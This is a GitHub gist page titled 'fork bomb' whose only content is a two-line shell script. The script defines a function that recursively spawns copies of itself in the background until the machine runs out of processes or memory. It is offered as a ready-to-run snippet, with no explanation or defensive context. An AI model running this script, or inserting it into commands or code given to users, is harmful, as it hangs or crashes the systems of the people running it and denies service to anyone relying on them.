Skip to content

Instantly share code, notes, and snippets.

@vvh413
Last active December 5, 2023 16:50
Show Gist options
  • Save vvh413/53afcb4886e736317fb6d9fb25ac9342 to your computer and use it in GitHub Desktop.
Save vvh413/53afcb4886e736317fb6d9fb25ac9342 to your computer and use it in GitHub Desktop.
fork bomb
#!/bin/sh
x(){ x|x& };x
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment